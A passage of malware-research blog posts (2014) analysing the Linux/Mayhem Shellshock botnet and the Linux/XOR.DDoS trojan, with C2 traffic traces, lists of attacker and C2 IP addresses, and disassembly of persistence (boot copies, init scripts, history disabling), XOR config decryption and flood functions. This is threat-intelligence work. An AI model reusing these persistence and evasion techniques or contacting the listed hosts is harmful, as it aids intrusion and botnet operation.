0x068B1     "LD_PRELOAD"  <=== preload
0x068BC     "/usr/bin/uname -a"  <=== grab info

The binary is self- decrypted for analysis/detection protection:

As per previous version too. During the execution the malware will drop the hidden file system contains the botnet ELF component files to be used for the further malicious operation (we will look into this encryption later on), as per below filename/permission/attributes/size details:

"-rw-r--r--  1 mmd mmd 12582912 Oct  7 06:58 .cahed_sess"
The samples are also making callback to the remote server (CNC). In our recorded case, this is the following communication:

CNC DNS query(raw):

uname({sysname="Linux", nodename="MY-", release="UNAME-IZ-", version="MMD-BANGS-YOU-", machine="AGAIN"}) = 0
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\3666\1\0\0\1\0\0\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
ioctl(4, FIONREAD, [49])    = 0
recvfrom(4, "\3666\201\200\0\1\0\1\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49
close(4)                    = 0

CNC sending and receiving communication:

socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("188.120.246.60")}, 16) = 0
write(4, "POST /mayhem.php HTTP/1.0\r\nHost:"..., 177) = 177
read(4, "HTTP/1.1 200 OK\r\nServer: nginx/1"..., 32768) = 153
read(4, "", 32768)          = 0
close(4)                    = 0

In PCAP capture:

Attack vector report

The host that serves Mayhem Perl script installer is located in France:

IP: 195.154.184.150
Reversed IP: 195-154-184-150.rev.poneytelecom.eu
ASN: 12876
CIDR: 195.154.0.0/16
ISP:BOOKMYNAME.COM | ONLINE S.A.S.
Country: France
↑We will need to clean this ASAP.

In another case the same sample was recorded to be distributed via sendspace.com file share service:

Below is the list of attacker's IP addresses which were reported matched to Mayhem Shellshock attack pattern, thank you to the contributors @yinettesys, @0xAli, @belmonte, @xme

1. Sum up of Mayhem ShellShock scanner and attacker IP source, we compiled as per statistic bellow:
(The data is as per Sat Oct 11 23:52:50 JST 2014, Format: Country, Count)

United States 25 '<=== many attacks come from USA network'
France         4
Turkey         3
Brazil         2
Canada         2
Netherlands    2
United Kingdom 2
Italy          1
Costa Rica     1
Argentina      1
Australia      1
Germany        1
Thailand       1
Kazakhstan     1
Ukraine        1
Poland         1
Indonesia      1
Sweden         1
Vietnam        1
New Zealand    1
Malaysia       1
Austria        1
Japan          1
------------------- +
Total         56 IP  of 23 countries
2. Mayhem Shellshock attackers IP in Geo location details as per Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, City, Region, Country Name
192.169.59.190, Santa Rosa, CA, United States
192.3.138.103, Buffalo, NY, United States
205.186.134.213, Culver City, CA, United States
209.11.159.26, Overland Park, KS, United States
216.121.52.101, San Francisco, CA, United States
54.213.225.160, Seattle, WA, United States
67.214.182.202, South Bend, IN, United States
69.10.33.130, Secaucus, NJ, United States
69.20.200.203, Grand Island, NE, United States
100.42.61.126, Santa Rosa, CA, United States
108.168.131.219, Dallas, TX, United States
162.144.46.158, Provo, UT, United States
166.62.16.106, Scottsdale, AZ, United States
198.167.142.184, Kansas City, MO, United States
209.126.148.164, San Diego, CA, United States
209.200.32.76, Garden City, NY, United States
75.101.129.180, Ashburn, VA, United States
50.193.119.109, Elmhurst, IL, United States
177.87.80.17, Rio De Janeiro, 21, Brazil
187.16.21.42, , , Brazil
91.221.99.35, Amsterdam, 07, Netherlands
95.211.131.148, , , Netherlands
37.187.77.163, , , France
94.23.113.220, , , France
194.27.156.249, Celâl, 84, Turkey
103.253.75.208, , , Thailand
103.244.50.23, , , New Zealand
116.193.76.20, Chanh Hiep, 75, Vietnam
184.107.246.98, Montréal, QC, Canada
190.10.14.37, San José, 08, Costa Rica
200.80.44.160, , , Argentina
202.76.235.110, , , Malaysia
93.74.63.83, Kiev, 12, Ukraine
176.67.167.180, , , United Kingdom
82.165.36.8, , , Germany
82.200.168.83, Astana, 05, Kazakhstan
95.110.178.157, , , Italy
103.7.84.13, Jakarta, 04, Indonesia
89.206.41.50, , , Poland
85.232.60.34, , , United Kingdom
91.130.113.149, , , Austria
110.44.30.204, Spring Hill, 07, Australia
83.168.199.4, Stockholm, , Sweden
184.106.196.169, San Antonio, TX, United States
216.119.149.163, Atlanta, GA, United States
184.106.196.169, San Antonio, TX, United States
67.23.9.241, San Antonio, TX, United States
216.228.104.39, Henderson, NC, United States
82.222.172.99, Istanbul, , Turkey
184.107.144.146, Montréal, QC, Canada
23.251.144.200, Mountain View, CA, United States
212.175.22.22, Istanbul, , Turkey
142.4.11.48, Provo, UT, United States
5.39.49.231, , , France
133.242.202.17, Tokyo, , Japan
94.23.42.182, Roubaix, , France
3. Mayhem Shellshock attacker IP per network details as per Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, Reverse Lookup IP, ASN, CIDR, Prefix, Country Code(2bits), ISP Code, ISP Name
192.169.59.190|emu.arvixe.com.|36351 | 192.169.48.0/20 | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
192.3.138.103|host.colocrossing.com.|36352 | 192.3.136.0/21 | AS-COLOCROSSING | US | HUDSONVALLEYHOST.COM | HUDSON VALLEY HOST
205.186.134.213|thewineconsultant.com.|31815 | 205.186.128.0/19 | MEDIATEMPLE | US | MEDIATEMPLE.NET | MEDIA TEMPLE INC.
209.11.159.26|cpanel.webindia.com.|40913 | 209.11.128.0/19 | QTS-SJC-1 | US | SEALCONSULT.COM | IBIS INC.
216.121.52.101|101.52.121.216.reverse.gogrid.com.|26228 | 216.121.0.0/17 | SERVEPATH | US | GOGRID.COM | GOGRID LLC
54.213.225.160|ec2-54-213-225-160.us-west-2.compute.amazonaws.com.|16509 | 54.213.0.0/16 | AMAZON-02 | US | AMAZON.COM | AMAZON.COM INC.
67.214.182.202|202.smart-dns.net.|12260 | 67.214.176.0/20 | COLOSTORE | US | COLOSTORE.COM | COLOSTORE.COM
69.10.33.130||19318 | 69.10.32.0/20 | NJIIX-AS-1 | US | INTERSERVER.NET | INTERSERVER INC
69.20.200.203|webvms.kdsi.net.|32101 | 69.20.200.0/24 | ASN-KLYS | US | KELLYSUPPLY.COM | KELLY SUPPLY COMPANY
100.42.61.126|starfish.arvixe.com.|36351 | 100.42.61.0/24 | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
108.168.131.219|s13.nzusatechgroup.com.|36351 | 108.168.128.0/19 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.
162.144.46.158|server.forkliftmarket.com.au.|46606 | 162.144.0.0/16 | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
166.62.16.106|ip-166-62-16-106.ip.secureserver.net.|26496 | 166.62.16.0/22 | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC
198.167.142.184|spanky.myserverplanet.com.|23033 | 198.167.142.0/24 | WOW | US | MYVIRPUS.COM | DNSSLAVE.COM
209.126.148.164||10439 | 209.126.128.0/17 | CARINET | US | PROENLACE.MX | CARI.NET
209.200.32.76|lazer.webair.com.|27257 | 209.200.32.0/19 | WEBAIR-INTERNET | US | WEBAIR.COM | WEBAIR INTERNET DEVELOPMENT COMPANY INC.
75.101.129.180|ec2-75-101-129-180.compute-1.amazonaws.com.|14618 | 75.101.128.0/17 | AMAZON-AES | US | AMAZON.COM | AMAZON.COM INC.
50.193.119.109|50-193-119-109-static.hfc.comcastbusiness.net.|7922 | 50.128.0.0/9 | COMCAST-7922 | US | COMCASTBUSINESS.NET | PLANET PARTS
177.87.80.17||262652 | 177.87.80.0/22 | R4C | BR | INTELIGNET.COM.BR | R4C SERVICOS DE INFORMATICA LTDA
187.16.21.42|forjastaurus.dominiotemporarioidc.com.|19089 | 187.16.21.0/24 | DH&C | BR | UOL.COM.BR | UNIVERSO ONLINE S.A.
91.221.99.35|h35-91.net.ix-host.ru.|50968 | 91.221.99.0/24 | HOSTMASTER | MD | IX-HOST.RU | HOSTMASTER LTD.
95.211.131.148|LLNH007.local.|16265 | 95.211.0.0/16 | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.
37.187.77.163|ns3366463.ip-37-187-77.eu.|16276 | 37.187.0.0/16 | OVH | FR | OVH.COM | OVH SAS
94.23.113.220||16276 | 94.23.0.0/16 | OVH | FR | OVH.COM | OVH SAS
194.27.156.249||8517 | 194.27.156.0/22 | ULAKNET | TR | - | CELAL BAYAR UNIVERSITESI
103.253.75.208||56309 | 103.253.72.0/22 | SIAMDATA | TH | - | TAN SPIRIT CO. LTD.
103.244.50.23||54113 | 103.244.50.0/24 | FASTLY | US | FASTLY.COM | FASTLY INC
116.193.76.20|sv20.quangtrungdc.name.vn.|24085 | 116.193.76.0/24 | QTSC-AS | VN | - | IP RANGE ALLOCATE FOR QTSC'S INTERNET DATA CENTER
184.107.246.98||32613 | 184.107.0.0/16 | IWEB-AS | CA | IWEB.COM | IWEB TECHNOLOGIES INC.
190.10.14.37|caam-190-10-14-a037.racsa.co.cr.|3790 | 190.10.14.0/24 | RADIOGRAFICA | CR | RACSA.CO.CR | SERVICIO CO-LOCATION RACSA
200.80.44.160|server.cubomagico.tv.|52270 | 200.80.44.0/24 | X | AR | IFXNW.COM.AR | NXNET
202.76.235.110||24218 | 202.76.224.0/20 | GTC-MY-PIP | MY | GLOBALTRANSIT.NET | GTC MY PIP NET
93.74.63.83|pedlarly-tack.volia.net.|25229 | 93.74.0.0/16 | VOLIA | UA | VOLIA.NET | KYIVSKI TELEKOMUNIKATSIYNI MEREZHI LLC
176.67.167.180||13213 | 176.67.160.0/20 | UK2NET | GB | UK2.NET | UK2 - LTD
82.165.36.8|s16296639.onlinehome-server.info.|8560 | 82.165.0.0/16 | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG
82.200.168.83|82.200.168.83.adsl.online.kz.|9198 | 82.200.160.0/20 | KAZTELECOM | KZ | - | ENU
95.110.178.157|alodrink.eu.|31034 | 95.110.160.0/19 | ARUBA | IT | ARUBA.IT | ARUBA S.P.A.
103.7.84.13|web2.jabikha.net.|23950 | 103.7.84.0/24 | GENID-AS | ID | JABIKHA.NET | PT JARINGAN BISNIS KHATULISTIWA
89.206.41.50|host50-89-206-41.limes.com.pl.|29649 | 89.206.0.0/18 | LIMES | PL | LIMES.COM.PL | LIMES S.C.
85.232.60.34|futureis-3.titaninternet.co.uk.|20860 | 85.232.48.0/20 | IOMART | GB | TITANINTERNET.CO.UK | TITAN INTERNET LTD
91.130.113.149|d91-130-113-149.cust.tele2.at.|1257 | 91.128.0.0/14 | TELE2,S | EU | TELE2.AT | TELE2 TELECOMMUNICATION SERVICES GMBH
110.44.30.204|110-44-30-204.host.neural.net.au.|45844 | 110.44.28.0/22 | NEURALNETWORKS-AS | AU | NEURAL.NET.AU | NEURAL NETWORKS DATA SERVERS PTY. LTD.
83.168.199.4|static-83-168-199-4.cust.crystone.se.|35041 | 83.168.199.0/24 | NET-CRYSTONE | SE | CRYSTONE.SE | CRYSTONE AB
184.106.196.169|184-106-196-169.static.cloud-ips.com.|19994 | 184.106.0.0/16 | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
216.119.149.163|216.119.149.163.static.midphase.com.|32780 | 216.119.144.0/20 | HOSTINGSERVICES-INC | US | MIDPHASE.COM | HOSTING SERVICES INC.
184.106.196.169|184-106-196-169.static.cloud-ips.com.|19994 | 184.106.0.0/16 | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
67.23.9.241|67-23-9-241.static.cloud-ips.com.|33070 | 67.23.0.0/19 | RMH-14 | US | RACKSPACE.COM | RACKSPACE CLOUD SERVERS
216.228.104.39|lamp2.ncol.net.|11426 | 216.228.96.0/20 | SCRR-11426 | US | NCOL.NET | NCOL.NET INC.
82.222.172.99|host-82-222-172-99.reverse.superonline.net.|34984 | 82.222.172.0/24 | TELLCOM | TR | SUPERONLINE.NET | TELLCOM ILETISIM HIZMETLERI A.S.
184.107.144.146||32613 | 184.107.0.0/16 | IWEB-AS | CA | - | POLLOCK NEAL
23.251.144.200|200.144.251.23.bc.googleusercontent.com.|15169 | 23.251.128.0/19 | GOOGLE | US | GOOGLE.COM | GOOGLE INC.
212.175.22.224|linux.zenpozitif.net.|9121 | 212.175.0.0/17 | TTNET | TR | SUNUCU.COM.TR | NETFACTOR
142.4.11.48|142-4-11-48.unifiedlayer.com.|46606 | 142.4.0.0/19 | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
5.39.49.231||16276 | 5.39.0.0/17 | OVH | FR | OVH.COM | OVH SAS
133.242.202.17|kokuralab.com.|7684 | 133.242.0.0/16 | SAKURA | JP | SAKURA.AD.JP | SAKURA INTERNET INC.
94.23.42.182|tx.irontec.com.|16276 | 94.23.0.0/16 | OVH | FR | OVH.COM | OVH SAS
With GeoIP graphical view, please click the image below: (thank's to JC for the GIPC!)

Thank you @xme (twitter) for Google mapping all IP sources into more comprehensive detail as per link below↓

These attacker IPs are the combination between (known) Mayhem bots we monitor and unknown sources (including the suspected possibility of new panels/CNC/bots). We are asking to the related ISP to check your host in details if your IP is listed above. The cleaning up of the botnet nodes will reduce the infection speed, please kindly cooperate.

For the sysadmins and ISP please BLOCK the IP address that listed in this report. It is proven wide-ranged targeted attack is on going from those IP, we checked in countries i.e.: Japan, Australia and Malaysia, below is another snip of different attack coming from listed IP addresses:

Thank's to @0xAli for this additional information

Since some requests came: You may ask us the log of attack for the purpose of cleaning your network from Mayhem botnet, by sending us the comment in the bottom of this post, please leave the email address so we can contact you. The comment will not be posted, feel free to test it beforehand.

More message and additional information

This is the warning, made and will be sent in various CERT contacts as reference. The threat is still not being neutralized yet and is still active (has just been started..is more like it) in infecting us. We are decided to be in hurry to raise this alert for the threat awareness. The material is to be added for updates and new analysis, so please take a look back for updates too.

The samples for the research purpose are shared via kernelmode, access here -->(LINK)

If Mayhem botnet uses shellshock, and this is a very serious threat, please work and cooperate together in good coordination in order to stop the source of the threat.

(reserved)We will add the information in here (/reserved)

References of previous version infection report of Mayhem
(ELF .so LD_PRELOAD malware)

1. MMD-0020-2014 - Analysis of infection ELF malware: libworker.so -->LINK
2. Video tutorial to dissect ELF .so malware that's using LD_PRELOAD -->LINK
3. MMD-0024-2014 - Recent Incident Report of ELF (LD_PRELOAD) libworker.so -->LINK
4. Repository of Linux/Mayhem threat in KernelMode.info -->LINK
5. Report by Yandex team, via Virus Bulletin -->LINK
6. Report by DamageLab.org -->LINK
7. Report by Artturi Lehtio via F-Secure blog -->LINK

Thank you for help in raising awareness and mention

We thank you for the help received from IT news media friends to raise awareness and the kindly link & mention our research.

1. Virus Bulletin
2. e-Week IT News
3. Threat Post
4. Security Affairs
5. PC World - Web sites, Business Security, Linux
5. Government Info Security
6. Softpedia - Server related security news
7. US Homeland Security - Daily Open Source Infrastructure Report [PDF]
8. Info Security Magazine
9. CERT Hungary Alert (Hungarian)
10. Kaldata (Bulgaria) Security News
11. SecurityLab (Russia)
12. NovostIT (Russia)
13. HagDig
14. IndusFace
15. Akamai Blog: Five Good Security Articles
16. Security Week
18. ITHome (Taiwan)
and many more, Google search keywords: "mayhem shellshock malwaremustdie"

#MalwareMustDie!

Monday, September 29, 2014

MMD-0028-2014 - Fuzzy reversing a new China ELF "Linux/XOR.DDoS"

This research is detected & solved by a hard work of MMD Germany members. Credits are in the bottom of the post.
The case is on and malware infrastructure is mostly up & alive, we don't want to be too details in writing because of that reason, we don't want to teach this crook of what they're lacking of by this post, yet this post necessary to raise awareness of this new emerged threat. Feel free to follow the process at will.

The infection

During the rush of #shellshock we saw another new threat emerged. We saw an attack log of one-liner shell script being injected via ssh connection. By the attack source+CNC IP and the payload, this looks like a China crook's new hack scheme to spread new ELF DDoS'er threat. This is spotted silently spread during the ‪#‎shellshock waves, noted: it was NOT using #shellshock exploit itself.

The details of the attacker's trace in one-liner shell command is as per shown below:

If we beautified it as per below we will see the obfuscation this shell script:

↑the marked mark is the point of all these code, to download the file 3502.rar from some defined host addresses.

The mentioned RAR file itself is actually a shell script too:

You can read the codes here, no free ride copy/paste this time, since we have hard times with those false positives from antiviruses

The main() function is explaining how this script works, read the comments we made (in purple colored words):

Shortly. The blue color explaining the obfuscation strings saved in some variables. The yellow marked color words are functions to be executed, and the red color area is the main function of this script, to download and install a payload.

The obfuscation used is in the enc() and dec() function (see that big pic codes) for encryption and decryption, by using the below code (I picked this one, the one used for decrypting)

tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]";
They called it encryption, but is just a mere obfuscator using the character map translation in "tr". Below is the easy shell script I made to decode them:

Below is the result:

We'll see another 3502 file. And a bunch of the CNC used. Noted the username and password they use ;)

If you permutated the URL with the payload name you will some ALIVE malware URLs like these:

What is this thing? In short: It's a sophisticated & well-thought ELF malware infection scheme, aiming Linux in multiple platform. It downloads, detect all parameter need to download the payload or source code of payload. It detected infected host's architecture, compiler. libraries together with sending sensitive information of the host, sent request to CNC to download the certain bins or to download resources to hack and then install the ELF binary.

The POC of this hack is the payload below:

The payload

The header looks very "fine":

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048110
First block:

Various analysis can resulted to the payload was coded in C, hmm..a quality up, we have a challenger here :) A new DDoS'er made in China. Here's the codes (for future reference):

'crtstuff.c'
'autorun.c'
'crc32.c'
'encrypt.c'
'execpacket.c'
'buildnet.c'
'hide.c'
'http.c'
'kill.c'
'main.c'
'proc.c'
'socket.c'
'tcp.c'
'thread.c'
'findip.c'
'dns.c'  
Some pointers for characteristic:

Self copy:

// create file for self-copy
open("/boot/[a-z]{10}", O_WRONLY|O_CREAT, 0400)
open("/boot/[a-z]{10}", O_WRONLY)

//chmod 755
chmod("/boot/[a-z]{10}", 0750)

// start to write..
open("/boot/[a-z]{10}", O_RDONLY)
Auto start:
// install SYS

.text:0x8048B2E   mov     dword ptr [esp], offset aSbinInsmod <== "/sbin/insmod"
.text:0x8048B35   call    LinuxExec_Argv
.text:0x8048B3A   mov     dword ptr [esp], 2
.text:0x8048B41   call    sleep

// xinetd setup..

.text:0x8048852   call    abstract_file_name
.text:0x8048857   mov     [ebp+var_8], eax
.text:0x804885A   mov     eax, [ebp+arg_0]
.text:0x804885D   mov     [esp+0Ch], eax
.text:0x8048861   mov     dword ptr [esp+8], offset aBinShS <== "#!/bin/sh\n%s\n"
.text:0x8048869   mov     dword ptr [esp+4], 400h
.text:0x8048871   lea     eax, [ebp+newpath]
.text:0x8048877   mov     [esp], eax
.text:0x804887A   call    snprintf
   :
.text:0x804887F   mov     eax, [ebp+var_8]
.text:0x8048882   mov     [esp+0Ch], eax
.text:0x8048886   mov     dword ptr [esp+8], offset aEtcInit_dS <== "/etc/init.d/%s"
.text:0x804888E   mov     dword ptr [esp+4], 400h
.text:0x8048896   lea     eax, [ebp+filename]
.text:0x804889C   mov     [esp], eax
.text:0x804889F   call    snprintf
.text:0x80488A4   mov     dword ptr [esp+4], offset aW <== "w"
.text:0x80488AC   lea     eax, [ebp+filename]
.text:0x80488B2   mov     [esp], eax
.text:0x80488B5   call    fopen
   :
.text:0x8048980   mov     dword ptr [esp+8], offset aEtcRcD_dS90S <== "/etc/rc%d.d/S90%s"
.text:0x8048988   mov     dword ptr [esp+4], 400h
.text:0x8048990   lea     eax, [ebp+newpath]
.text:0x8048996   mov     [esp], eax
.text:0x8048999   call    "snprintf"
.text:0x804899E   lea     eax, [ebp+newpath]  // assemble flag component for file attribs
.text:0x80489A4   mov     [esp], eax      <== "filename"
.text:0x80489A7   call    "unlink"
.text:0x80489AC   lea     eax, [ebp+newpath]
.text:0x80489B2   mov     [esp+4], eax    <== "newpath"
.text:0x80489B6   lea     eax, [ebp+filename]
.text:0x80489BC   mov     [esp], eax      <== "oldpath"
.text:0x80489BF   call    "symlink"
.text:0x80489C4   cmp     [ebp+var_C], 0
.text:0x80489C8   jnz     short loc_80489E8
.text:0x80489CA   mov     dword ptr [esp+8], 0AD1473B8h <== "group"
.text:0x80489D2   mov     dword ptr [esp+4], 0AD1473B8h <== "owner"
.text:0x80489DA   lea     eax, [ebp+filename]
.text:0x80489E0   mov     [esp], eax      <== "filename"
.text:0x80489E3   call    "lchown"
Malicious environment setup (i.e. export cmd):
0x06988C   HOME=/
0x069893   HISTFILE=/dev/null
0x0698A6   MYSQL_HISTFILE=/dev/null
0x0698C0   PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

Encryption:

There are some encryption to be decrypted in this malware, that I tested as per below, that looks having xor pattern:

// checking decryptor...

.text:0x804CB63   mov   dword ptr [esp+4], offset aM_Nfr7nlqqgf_0
.text:0x804CB6B   lea   eax, [ebp+filename]
.text:0x804CB71   mov   [esp], eax
.text:0x804CB74   call  dec_conf           // decrypting function..
.text:0x804CB79   mov   dword ptr [esp+8], 0Ch // <== break it here..

Breakpoint 1, 0x0804cb79 in main ()
query offset aM_Nfr7nlqqgf_0: "m.[$nFR$7nLQQGF"
query register: $esp
0xffffa1b0:  "[\305\377\377\343\033\v\b\020"
;-----------------------
.text:0x804CB81   mov    dword ptr [esp+4], offset aM_Nfr7n9_0
.text:0x804CB89   lea    eax, [ebp+var_114D]
.text:0x804CB8F   mov    [esp], eax
.text:0x804CB92   call   dec_conf

Breakpoint 2, 0x0804cb9 in main ()
query offset aM_Nfr7n9_0: "m.[$nFR$7n9"
query register: $esp
0xffffa1b0:  "[\304\377\377\363\033\v\b\f"
;-----------------------
.text:0x804CBBD   mov    dword ptr [esp+4], offset aM4s4nacNa ; "m4S4nAC/nA"
.text:0x804CBC5   lea    eax, [ebp+var_E4D]
.text:0x804CBCB   mov    [esp], eax
.text:0x804CBCE   call   dec_conf
.text:0x804CBD3   mov    [ebp+var_34], 0

Breakpoint 3, 0x0804cbd3 in main ()
query offset aM4s4nacNa ; "m4S4nAC/nA"
query register: $esp
0xffffa1b0:  "[\307\377\377#\034\v\b\v"
Here is the xor used as the component logic for the decryption function:

With the key that lead to this address:

It "looks like" the author is having "interesting" way to remind him the XOR key itself, I don't investigate this further since I had the goal..

A hard-coded callback IP address

And look what I got next to the xor key :))

So now we know the CNC is too ;)

IP: 103.25.9.228||59270 | 103.25.9.0/24 | CLOUD 
Country: "HK | CLOUDRELY.COM" |CLOUD RELY LIMITED

The bummer part of this malware is, it crashed itself when run under limited permission...

"msec   calls "
-----------------------------------------------------------------------
(120): execve("./SAMPLE-MALWARE", ["./SAMPLE-MALWARE"], ["SHELL=etc..])
(125): set_thread_area(0xffc8373c)
(126): set_tid_address(0x92e6888)
(127): set_robust_list(0x92e6890, 0xc)
(128): futex(0xffc83a04, FUTEX_WAKE_PRIVATE, 1)
(129): rt_sigaction(SIGRTMIN, {0x8053860, [], SA_SIGINFO}, NULL, 8)
(130): rt_sigaction(SIGRT_1, {0x8053780, [], SA_RESTART|SA_SIGINFO}, NULL, 8)
(131): rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8)
(132): getrlimit(RLIMIT_STACK,etc)
(133): uname({sysname="Linux", nodename="mmd", release="mmd-amd64", 
             version="#1 SMP mmd-7u1", machine="saever-momma"})
(142): readlink("/proc/self/exe", "/home/mmd/test/SAMPLE-MALWARE", 1023)
(143): clone(Process)
(145): exit_group(0)
(146): [pid new] setsid()
(147): open("/dev/null", O_RDWR)
(148): fstat64(3, {st_dev=makedev] etc) 
(149): dup2(3, 0)
(150): dup2(3, 1)
(151): dup2(3, 2)
(152): close(3)
(153): readlink("/proc/self/exe", "/home/mmd/test/SAMPLE-MALWARE", 1023) = 20
(154): stat64("/boot" etc)
(155): stat64("/lib", etc)
(156): stat64("/lib/udev" etc)
(157): stat64("/var", etc)
(158): stat64("/var/run", etc)
(159): gettimeofday({1411989055, 135168}, NULL) 
(160): readlink("/proc/self/exe", "/home/mmd/test/SAMPLE-MALWARE", 1023) 
(161): unlink("/lib/udev/udev") 
(162): open("/home/mmd/test/SAMPLE-MALWARE", O_RDONLY)
(163): open("/lib/udev/udev", O_WRONLY|O_CREAT, 0400)
(165): open("/home/mmd/test/SAMPLE-MALWARE", O_RDONLY)
(166): open("/boot/[a-z]{10}", O_WRONLY|O_CREAT, 0400)
(168): open("/boot/[a-z]{10}", O_WRONLY)
(169): clone(Process attached
(171): waitpid(Process suspended
(173): clone(Process attached
(175): exit_group(0)
(179): rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8)
(180): rt_sigaction(SIGCHLD, NULL, {SIG_IGN, [CHLD], SA_RESTART}, 8)
(181): nanosleep({1, 0},..
(192): chmod("/boot/[a-z]{10}", 0750)
(193): open("/boot/[a-z]{10}", O_RDONLY)
(194): "--- SIGSEGV (Segmentation fault) @ 0 (0)" --- ref: [a-z]{10}
(197): "rt_sigprocmask(SIG_SETMASK, [], NULL, 8)"
It saves the file in /boot with this regex: [a-z]{10}

What is the purpose of this malware?

The first is backdoor, and then, obviously DoS (SYN, UDP, TCP flood), using encrypted (temporary) config. Below is the PoC of the DDoS function names:

0x09305E   build_syn // SYN Flood
0x0950D0   build_tcphdr // TCP Flood
0x097101   build_udphdr // UDP FLood
And below is part of backdoor operation using HTTP/1.1 GET (to download / update) and callback in HTTP/1.1 POST:
.text:0x804A917   mov   dword ptr [esp+8], offset aPostSHttp1_1Sh
                        value: "POST %s HTTP/1.1\r\n%sHost: %s\r\nContent-T"
.text:0x804AB1D   mov   dword ptr [esp+8], offset aGetSHttp1_1Sho
                        value: "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"
Based on the code it looks like using AES.DDoS'er and IptabLes strategy to install, but the source are different. So, this is another new China DDoS'er, I call this as Linux/XOR.DDoS.

Virus Total and sample

Virus total detection is below (click the image to access..) One of 55 is a bad detection..

Sample is shared in kernel mode-->[here]

Conclusion & Credits

This threat is the first time we see using complicated installer/builder. I and other team mates start to feel like playing CTF with this crook. They (China actors) are improving in steps, we must be aware. Please stay safe folks..

Credit: @shibumi (threat sensoring), @wirehack7 (formulation), and others who doesn't want to be mentioned.

Additional

(A reserved section for additional and updates)

#MalwareMustDie!!